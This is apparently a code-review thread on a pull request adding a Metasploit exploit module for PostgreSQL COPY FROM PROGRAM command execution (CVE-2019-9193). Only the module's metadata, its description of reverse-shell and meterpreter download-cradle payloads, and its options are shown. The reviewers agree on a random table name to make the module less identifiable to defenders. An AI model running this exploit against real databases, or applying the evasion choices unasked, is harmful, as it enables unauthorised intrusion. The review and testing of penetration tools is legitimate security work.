modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb

```diff
@@ -0,0 +1,248 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/postgres'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Postgres
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'PostgreSQL COPY FROM PROGRAM Command Execution',
+      'Description' => %q(
+        Installations running Postgres 9.3 and above have functionality which allows for the superuser
+        and users with 'pg_read_server_files' to pipe to and from an external program using COPY.
+        This allows arbitary command execution as though you have console access.
+
+        This module attempts to create a new table, then execute system commands in the context of
+        copying the command output into the table.
+
+        This module should work on all Postgres systems running version 9.3 and above.
+
+        For Linux & OSX systems, cmd stagers are used such as: cmd/unix/reverse_perl
+
+        For Windows Systems command is placed in the COMMAND parameter, such as a powershell
+        download cradle for meterpreter
+      ),
+      'Author' => [
+        'Jacob Wilkin' # Exploit Author of Module
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2019-9193'],
+        ['URL', 'https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5'],
+        ['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] #Patch notes adding the function, see 'E.26.3.3. Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)'
+      ],
+      'PayloadType' => 'cmd',
+      'Platform' => %w(linux unix win osx),
+      'Payload' => {
+      },
+      'Arch' => [ARCH_CMD],
+      'Targets' => [
+        ['Automatic', {}]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Mar 20 2019'
+    ))
+
+    register_options([
+      Opt::RPORT(5432),
+      OptString.new('TABLENAME', [ true, 'A table name that doesnt exist(To avoid deletion)', 'msftesttable']),
```

Comment:
Given that the user has `pg_read_server_files` privileges, they can probably also create tables (?)

Perhaps a better approach would be to generate a random table name (one less easily identifiable than `msfttesttable`, and throw an error if the table already exists. The module could expose an advanced option to proceed anyway, allowing overwriting of existing tables (off by default).

Reply:
Wouldn't it be better to leave in an identifier by default, to help the blue team? Its currently easy to change if you want to be a bit more stealthy?

Reply:
Helping the blue team is not part of the Metasploit mission statement.

Reply:
That sound like a good compromise to me @bcoles, are you able to commit that change?

Reply:
Something like this:

```suggestion
      OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]),
```